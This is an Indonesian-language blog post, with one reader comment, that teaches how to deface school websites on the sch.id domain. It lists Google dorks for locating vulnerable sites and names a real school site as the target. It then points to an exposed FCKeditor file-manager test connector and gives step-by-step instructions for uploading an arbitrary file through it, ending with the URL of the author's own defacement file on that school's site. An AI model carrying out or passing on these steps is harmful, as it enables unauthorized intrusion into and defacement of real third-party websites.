buat yg udh master dewa dsb dilarang keras membaca artikel ini , karena akan membuat anda mati kebosanan ! kwokw
trik ini membahas tentang cara deface web sekolah sch.id, udah pinter deface kan ? ya uda monggo langsong bae kito prakteken samo samo
pertamo siapke dulu perlatanyo !! file .txt dari notepad (isinya terserah nak namo pacar nenek ibuk kaka terserah) nama aq jugo boleh ! hahaha
udah buat file kan ? yauda monggo lanjutt !
buka google dulu ! teros masokin Dork (kata kunci) nih nah aq udh ado dorknyo , tinggal peleh dewek :
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
kalo kito ngetek dork kan ado banyak web skolah kan..?? , nah kito tinggal peleh beh
kalo aq peleh yg ini http://www.smapgri2palembang.sch.id/
tros siapke Exploit dulu , tenang beh , aq lah punya exploitnyo nah :
Exploit: /editor/filemanager/connectors/test.html
langsong beh di hajar..!! , masukke exploitnyo tadi ke url web sch.id
contohnyo nah
ex : http://www.smapgri2palembang.sch.id/edit.../test.html
nah, udah muncol kan yang mau di pepes !
pada kolom Connector *ASP ubah menjadi *PHP teros kolom Resource Type ubah jadi *FILE
tros klik Browse (cari file .txt yang kamu buat tadi) > Upload
kalo udh berhasil di upload , tinggal buka bae hasilnyo
http://sitetarget.sch.id/userfiles/namafileLo.txt
atau => http://sitetarget.sch.id/userfiles/file/namafileLo.txt
mudah kan Bro ? ini nah hasil depes punyo aq
http://www.smapgri2palembang.sch.id/userfiles/file/defaceby-Faiz.txt
wkakka udah pacak pepes kan ? ini masi upload file, kalo udh master nian kito pacak kok deface indexnyo
demikian sedikit trik pepes web skolah, kalo ado kekurangan aq minta maaf beh eeh :) aq bukan hacker ato defacer aq cuma penulis sukarela (tak dibayar)
oke sekian terima kasih, komen bae kalo belom jelas ! :D
sumber : artikel Faiz
waw mastah aku dari palembang jugok tapi noob
BalasHapus